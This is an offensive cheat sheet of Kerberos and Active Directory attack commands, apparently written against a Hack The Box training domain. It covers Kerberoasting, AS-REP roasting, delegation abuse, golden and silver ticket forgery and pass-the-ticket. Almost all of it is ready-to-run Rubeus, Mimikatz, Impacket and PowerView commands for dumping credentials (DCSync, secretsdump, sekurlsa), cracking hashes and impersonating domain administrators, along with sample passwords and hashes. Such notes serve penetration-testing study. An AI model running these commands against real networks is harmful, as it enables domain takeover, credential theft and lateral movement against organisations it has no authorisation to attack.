Kerberos Attacks
From Linux
GetUserSPN
# Request 1 Ticket
GetUsersSPNs.py -dc-ip <ip> <domain/<user> -request-user <username>
# Request All Tickets
GetUsersSPNs.py -dc-ip <ip> <domain/<user --request
# Save to Output
GetUserSPNs.py -dc-ip <ip> INLANEFREIGHT.LOCAL/forend -request-user sqldev -outputfile sqldev_tgs
# Crack TGS Ticket
hashcat -m 13100 file.tgs $ROCKYOU
From Windows
setspn.exe
# Find Accounts with SPN
setspn.exe -Q */*
# Better Command
setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
Mimikatz
# Enable Base64 Output
base64 /out:true
# Export Tickets
kerberos::list /export
# Modify To Better Format
echo "<base64 blob>" | tr -d \\n
# Output To John Format
cat encoded_file | base64 -d > sqldev.kirbi
# Make to John Format
python2.7 kirbi2john.py sqldev.kirbi
# HashCat Way, Modify to hashcat format
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/'
PowerView
# Import Module
Import-Module .\PowerView.ps1
# List Users With SPN
Get-DomainUser * -spn | select samaccountname
# Target Single User + Hashcat Output
Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat
Rubeus
# /Stats
.\Rubeus.exe kerberoast /stats
# List Admin Privileges Users for Kerberoasting
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
Double Hop Workarounds
Method 1: PSCredential Object
# Set password
$SecPassword = ConvertTo-SecureString '0xF0rk123!' -AsPlainText -Force
# Set Proper Login
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\backupadm', $SecPassword)
# Use Command with Credentials
get-domainuser -spn -credential $Cred | select samaccountname
Method 2: Register PSSession Configuration
# Check HTTP Ticket Present
klist
# Configure PSSession
Register-PSSessionConfiguration -Name backupadmsess -RunAsCredential inlanefreight\backupadm
# Connect
Enter-PSSession -ComputerName DEV01 -Credential INLANEFREIGHT\backupadm -ConfigurationName backupadmsess
Roasting Attacks
AS-REPRoasting (Windows)
AS-REP Roasting Enumeration
# PowerView: Discover Account with Pre-Authentication Disbaled
Get-DomainUser -UACFilter DONT_REQ_PREAUTH | select samaccountname,useraccountcontrol
# Rubeus: Enumerate all user Accounts for Pre-Authentication
Rubeus.exe asreproast /format:hashcat
Performing AS-REPRoasting
# Rubeus
.\Rubeus.exe asreproast /user:jenna.smith /domain:inlanefreight.local /dc:dc01.inlanefreight.local /nowrap /outfile:hashes.txt
# Crack the Hash
hashcat.exe -m 18200 hashes $ROCKYOU
Set DONT_REQ_PREAUTH (PowerView)
Set-DomainObject -Identity userName -XOR @{useraccountcontrol=4194304} -Verbose
AS-REPRoasting (LInux)
AS-REPRoasting Users Enumeration
GetNPUsers.py inlanefreight.local/pixis -request
Find Accounts Without Authentication
GetNPUsers.py INLANEFREIGHT/ -dc-ip 10.129.205.35 -usersfile /tmp/users.txt -format hashcat -no-pass
Kerberoasting (Windows)
Manual Detection (PowerShell Script)
$search = New-Object DirectoryServices.DirectorySearcher([ADSI]"")
$search.filter = "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))"
$results = $search.Findall()
foreach($result in $results)
{
$userEntry = $result.GetDirectoryEntry()
Write-host "User"
Write-Host "===="
Write-Host $userEntry.name "(" $userEntry.distinguishedName ")"
Write-host ""
Write-host "SPNs"
Write-Host "===="
foreach($SPN in $userEntry.servicePrincipalName)
{
$SPN
}
Write-host ""
Write-host ""
}
# Run Script
.\FindSPNAccounts.ps1
Find Accounts with SPN (PowerView)
# Find Accounts
Get-DomanUser -SPN | select samaccountname, serviceprincipalname,memberof
Invoke Kerberoasting (PowerView)
Invoke-Kerberoast
Rubeus Kerberoasting
Rubeus.exe kerberoast /nowrap
Kerberoasting Without Account Password
https://www.semperis.com/blog/new-attack-paths-as-requested-sts/
In order to perform this attack, we need the following:
Username of an account with pre-authentication.
A target SPN.
Rubeus.exe kerberoast /nopreauth:amber.smith /domain:inlanefreight.local /spn:MSSQLSvc/SQL01:1433 /nowrap
Kerberoasting (Linux)
Get Account SPN
GetUserSPNs.py inlanefreight.local/pixis -request
Unconstrained Delegation
Unconstrained Delegation - Computer
Method 1 (Waiting Authentication)
1 Monitor Stored Tickets (Rubeus)
.\Rubeus.exe monitor /interval:5 /nowrap
2 Using Captured Ticket to Request Another Ticket
.\Rubeus.exe asktgs /ticket:<base64> /service:cifs/dc01.INLANEFREIGHT.local /ptt
3 Using Newly ticket
dir \\dc01.inlanefreight.local\c$
Method 2 (Printer Bug)
https://github.com/leechristensen/SpoolSample
1 Monitor Tickets
.\Rubeus.exe monitor /interval:5 /nowrap
2 Abusing Printer Bug
.\SpoolSample.exe dc01.inlanefreight.local sql01.inlanefreight.local
3 Captare & Renew Ticket
# Once Intercepted, we need to renew the ticket
.\Rubeus.exe renew /ticket:<base64> /ptt
4 DcSync
# Since we haveTicket from dc01 and can dump all the hashes
lsadump::dcsync
5 Using NT Hash
# With DCSync, we are able to get all the hashes, we use the administrator hash to askTGT
.\Rubeus.exe asktgt /rc4:<NT-Hash> /user:<user> /ptt
# Perform Actions on DC01
dir \\dc01.inlanefreight.local\c$
Unconstrained Delegation - Users
Gather Unconstrained Delegation Users (Powerview)
Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)" | select samaccountname, useraccountcontrol
1 Create Fake DNS Record
https://github.com/dirkjanm/krbrelayx
# Host DNS Server
python dnstool.py -u INLANEFREIGHT.LOCAL\\pixis -p p4ssw0rd -r roguecomputer.INLANEFREIGHT.LOCAL -d 10.10.14.2 --action add 10.129.1.207
2 Verify DNS
nslookup roguecomputer.inlanefreight.local dc01.inlanefreight.local
3 Craft SPN
python addspn.py -u inlanefreight.local\\pixis -p p4ssw0rd --target-type samname -t sqldev -s CIFS/roguecomputer.inlanefreight.local dc01.inlanefreight.local
4 Decrypt Ticket
sudo python krbrelayx.py -hashes :cf3a5525ee9414229e66279623ed5c58
5 Leveraging Printer Bug
https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py
python3 printerbug.py inlanefreight.local/carole.rose:[email protected] fakepcs.inlanefreight.local
6 Perform Attack
sudo python krbrelayx.py -hashes :cf3a5525ee9414229e66279623ed5c58
7 Export ccache + Secrets Dump
export KRB5CCNAME=<ccache>
secretsdump.py -k -no-pass dc01.inlanefreight.local
Constrained Delegation
Constrained Delegation (Windows)
Gather Constrained Delegation Computers
Get-DomainCoputer -TrustedAuth | select serviceprincipalname,dnshostname,useraccountcontrol
1 Get Machine Hash (Mimikatz)
.\mimikatz.exe privilege::debug sekurlsa::msv exit
2 Constrained Delegation Attack
# Need Machine Hash as rc4
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:www/WS01.inlanefreight.local /altservice:HTTP /user:DMZ01$ /rc4:ff955e93a130f5bb1a6565f32b7dc127 /ptt
# Verify Ticket
klist
# Enter Session
Enter-PSSession ws01.inlanefreight.local
Constrained Delegation (Linux)
1 Find Delegation Accounts
findDelegation.py INLANEFREIGHT.LOCAL/carole.rose:jasmine
2 Craft Valid TGS Ticket
getST.py -spn SERVER01 'INLANEFREIGHT.LOCAL/daniel.whitehead:dolphin' -impersonate Administrator
3 Login With TGS Ticket
# Export ccache
export KRB5CCNAME=<ccache>
# Login
psexec.py -k -no-pass INLANEFREIGHT.LOCAL/administrator@DC01 -debug
Resource Based Delegation (Windows)
Enumerate RBCD Script
# import the PowerView module
Import-Module C:\Tools\PowerView.ps1
# get all computers in the domain
$computers = Get-DomainComputer
# get all users in the domain
$users = Get-DomainUser
# define the required access rights
$accessRights = "GenericWrite","GenericAll","WriteProperty","WriteDacl"
# loop through each computer in the domain
foreach ($computer in $computers) {
# get the security descriptor for the computer
$acl = Get-ObjectAcl -SamAccountName $computer.SamAccountName -ResolveGUIDs
# loop through each user in the domain
foreach ($user in $users) {
# check if the user has the required access rights on the computer object
$hasAccess = $acl | ?{$_.SecurityIdentifier -eq $user.ObjectSID} | %{($_.ActiveDirectoryRights -match ($accessRights -join '|'))}
if ($hasAccess) {
Write-Output "$($user.SamAccountName) has the required access rights on $($computer.Name)"
}
}
}
1 Create Fake Computer
# Import PowerMad
Import-Module .\Powermad.ps1
# Add New Computer
New-MachineAccount -MachineAccount HACKTHEBOX -Password $(ConvertTo-SecureString "Hackthebox123+!" -AsPlainText -Force)
2 Modify Attributes Created Computer
Obtain Computer SID.
Use SDDL to create a security descriptor
Set
msDS-AllowedToActOnBehalfOfOtherIdentity
in raw binary format.Modify the target computer.
# Import PowerView
Import-Module .\PowerView.ps1
# Step 1
$ComputerSid = Get-DomainComputer HACKTHEBOX -Properties objectsid | Select -Expand objectsid
# Step 2
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
# Step 3
$credentials = New-Object System.Management.Automation.PSCredential "INLANEFREIGHT\carole.holmes", (ConvertTo-SecureString "Y3t4n0th3rP4ssw0rd" -AsPlainText -Force)
# Step 4
Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Credential $credentials -Verbose
3 Get Computer Hash
.\Rubeus.exe hash /password:Hackthebox123+! /user:HACKTHEBOX$ /domain:inlanefreight.local
4 Request TGS Ticket
# /altservice:host,RPCSS,wsman,http,ldap,krbtgt,winrm
.\Rubeus.exe s4u /user:HACKTHEBOX$ /rc4:CF767C9A9C529361F108AA67BF1B3695 /impersonateuser:administrator /msdsspn:cifs/dc01.inlanefreight.local /ptt
# Connect to DC
ls \\dc01.inlanefreight.local\c$
Resource Based Delegation (Linux)
1 Create a New Computer
addcomputer.py -computer-name 'HACKTHEBOX$' -computer-pass Hackthebox123+\! -dc-ip 10.129.96.44 inlanefreight.local/carole.holmes:'Y3t4n0th3rP4ssw0rd'
2 Add Computer to Trusted List
https://raw.githubusercontent.com/tothi/rbcd-attack/master/rbcd.py
python3 rbcd.py -dc-ip 172.16.8.35 -t DC01 -f HACKTHEBOX 'inlanefreight.local/annette.jackson:horses'
3 Request TGS Ticket
getST.py -spn cifs/DC01.inlanefreight.local -impersonate Administrator -dc-ip 10.129.96.44 inlanefreight.local/HACKTHEBOX:Hackthebox123+\!
4 Export ccache & Login
# Export ccache
export KRB5CCNAME=<ccache>
# psexec
psexec.py -k -no-pass dc01.inlanefreight.local
Ticket Abuse
Golden Ticket (Windows)
We need 4 elements in order to perform a Golden Ticket attack.
Domain Name
Domain SID
KRBTGT's Hash
Username to impersonate
1 Gather Domain Name
Get-Domain
2 Gather Domain SID
Get-DomainSID
3 Gather krbtgt Hash
.\mimikatz.exe privilege::debug "lsadump::dcsync /user:krbtgt /domain:inlanefreight.local" exit
4 Forge Golden Ticket
.\mimikatz.exe "kerberos::golden /domain:inlanefreight.local /user:Administrator /sid:S-1-5-21-1870146311-1183348186-593267556 /rc4:c0231bd8a4a4de92fca0760c0ba9e7a6 /ptt" "exit"
5 Login
Enter-PSSession dc01
Golden Ticket (Linux)
1 Gather Domain (SID)
lookupsid.py inlanefreight.local/[email protected] -domain-sids
2 Create Golden Ticket
ticketer.py -nthash c0231bd8a4a4de92fca0760c0ba9e7a6 -domain-sid S-1-5-21-1870146311-1183348186-593267556 -domain inlanefreight.local Administrator
3 Importing and Use Ticket
export KRB5CCNAME=<ccache>
# Login
psexec.py -k -no-pass dc01.inlanefreight.local
Silver Ticket (Windows)
1 Gather Domain SID
Get-DomainSid
2 Compromised Service Account
Without this account, a silver ticket is not possible
3 Forge Silver Ticket
.\mimikatz.exe "kerberos::golden /domain:inlanefreight.local /user:Administrator /sid:S-1-5-21-1870146311-1183348186-593267556 /rc4:027c6604526b7b16a22e320b76e54a5b /target:sql01.inlanefreight.local /service:cifs /ptt" "exit"
Create Sacrificial Process
# Create Process
Rubeus.exe createnetonly /program:cmd.exe /show
# Import Silver Ticket
Rubeus.exe ptt /ticket:sql01.kirbi
# Login
PSExec.exe -accepteula \\sql01.inlanefreight.local cmd
Silver Ticket (Linux)
1 Retrieve Domain SID
lookupsid.py inlanefreight.local/[email protected] -domain-sids
2 Create Silver Ticket
ticketer.py -nthash 542780725df68d3456a0672f59001987 -domain-sid S-1-5-21-1870146311-1183348186-593267556 -domain inlanefreight.local -spn cifs/sql01.inlanefreight.local Administrator
3 Export ccache
export KRB5CCNAME=<ccache>
# Login
smbclient.py -k -no-pass sql01.inlanefreight.local
Pass The Ticket
Pass-the-Ticket takes the user's Ticket Granting Ticket (TGT) or Ticket Granting Service (TGS) Ticket. The TGT is a signed ticket that contains a list of privilege levels. This TGT is passed to the Domain Controller, which will grant the TGS Ticket that can be used to access machines. Stealing either of these tickets makes it possible to perform lateral movement.
1 Create Sacrificial Process
.\Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show
2 Read Tickets
.\rubeus.exe triage
3 Extract Ticket With Rubeus
# krbtgt/INLANEFREIGHT.LOCAL
.\Rubeus.exe dump /luid:0x89275d /service:krbtgt /nowrap
4 Renew Ticket
Rubeus.exe renew /ticket:<base64> /ptt
4 Read Files
dir \\dc01\\c$
Last updated